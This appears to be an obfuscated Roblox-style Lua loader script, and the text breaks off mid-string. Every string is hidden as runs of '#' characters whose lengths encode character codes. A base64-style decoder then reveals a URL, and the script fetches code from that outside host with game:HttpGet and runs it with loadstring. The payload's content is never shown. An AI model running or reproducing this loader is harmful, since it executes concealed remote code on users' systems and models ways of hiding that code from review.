function RkqbqonQCWYndDa(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


local b=RkqbqonQCWYndDa({'#################################################################','##################################################################','###################################################################','####################################################################','#####################################################################','######################################################################','#######################################################################','########################################################################','#########################################################################','##########################################################################','###########################################################################','############################################################################','#############################################################################','##############################################################################','###############################################################################','################################################################################','#################################################################################','##################################################################################','###################################################################################','####################################################################################','#####################################################################################','######################################################################################','#######################################################################################','########################################################################################','#########################################################################################','##########################################################################################','#################################################################################################','##################################################################################################','###################################################################################################','####################################################################################################','#####################################################################################################','######################################################################################################','#######################################################################################################','########################################################################################################','#########################################################################################################','##########################################################################################################','###########################################################################################################','############################################################################################################','#############################################################################################################','##############################################################################################################','###############################################################################################################','################################################################################################################','#################################################################################################################','##################################################################################################################','###################################################################################################################','####################################################################################################################','#####################################################################################################################','######################################################################################################################','#######################################################################################################################','########################################################################################################################','#########################################################################################################################','##########################################################################################################################','################################################','#################################################','##################################################','###################################################','####################################################','#####################################################','######################################################','#######################################################','########################################################','#########################################################','###########################################','###############################################'})
function EHzJYtAKqyGcSNPV(data) m=string.sub(data, 0, 210) data=data:gsub(m,RkqbqonQCWYndDa({}))

data = string.gsub(data, RkqbqonQCWYndDa({'###########################################################################################','##############################################################################################'})..b..RkqbqonQCWYndDa({'#############################################################','#############################################################################################'}), RkqbqonQCWYndDa({})) return (data:gsub(RkqbqonQCWYndDa({'##############################################'}), function(x) if (x == RkqbqonQCWYndDa({'#############################################################'})) then return RkqbqonQCWYndDa({}) end local r,f=RkqbqonQCWYndDa({}),(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and RkqbqonQCWYndDa({'#################################################'}) or RkqbqonQCWYndDa({'################################################'})) end return r; end):gsub(RkqbqonQCWYndDa({'#####################################','####################################################################################################','#####################################','####################################################################################################','#####################################','####################################################################################################','###############################################################','#####################################','####################################################################################################','###############################################################','#####################################','####################################################################################################','###############################################################','#####################################','####################################################################################################','###############################################################','#####################################','####################################################################################################','###############################################################','#####################################','####################################################################################################','###############################################################'}), function(x) if (#x ~= 8) then return RkqbqonQCWYndDa({}) end local c=0 for i=1,8 do c=c+(x:sub(i,i)==RkqbqonQCWYndDa({'#################################################'}) and 2^(8-i) or 0) end return string.char(c) end)) end


 


loadstring(game:HttpGet(EHzJYtAKqyGcSNPV(RkqbqonQCWYndDa({'##########################################################################################','#######################################################################','######################################################################################################','######################################################################################################################','########################################################################################################','##########################################################################################################################','#######################################################################################################################','########################################################################','########################################################################################','####################################################################################################','##################################################################################','######################################################################################','########################################################################################################################','##############################################################################','####################################################################################################################','######################################################################################################','#######################################################################################################','#################################################################################################','####################################################################','#################################################################################','############################################################################','##########################################################################################','############################################################################################################','##########################################################################################################################','###############################################################################','###############################################################################################################','######################################################################################################################','########################################################################################################','############################################################################################################','###################################################################################################################','#######################################################################################################################','#####################################################################################','########################################################################################################','##############################################################################','######################################################################################################################','################################################################################','#####################################################################################','########################################################################','#######################################################################','####################################################################','########################################################################','######################################################################################################','########################################################################################','####################################################################################################################','#####################################################################','#######################################################################################################','###############################################################################','###############################################################################################################','#####################################################################################################################','#######################################################################################################################','#########################################################################################','#######################################################################################################','######################################################################################','##########################################################################################################################','#########################################################################################','###################################################################################################','##########################################################################################################','############################################################################','###########################################################################################################','#####################################################################################################','###################################################################################################################','######################################################################################################################','#######################################################################################################','########################################################################################################','######################################################################################################################','#####################################################################################################################','########################################################################','#####################################################################','###########################################################################################################','######################################################################################################################','########################################################################################################################','#############################################################################################################','####################################################################','#################################################################################################################','#############################################################################################################','#############################################################################','#####################################################################################################################','####################################################################################################','#########################################################################################','######################################################################################','#######################################################################################','########################################################################################################','##################################################################','################################################################################################################','####################################################################################################','#####################################################################','#################################################################################################################','###################################################################################','########################################################################','###########################################################################','#################################################################','#####################################################################################################','#####################################################################################################','##################################################################','#####################################################################################################################','###############################################################################','#########################################################################################','#######################################################################################','######################################################################','###########################################################################################################','#####################################################################################','####################################################################','#########################################################################################################################','########################################################################','##########################################################################################################','###############################################################################################################','###############################################################################','#################################################################','#############################################################################################################','########################################################################################################################','############################################################################################################','################################################################################################################','################################################################################################################','#################################################################','###############################
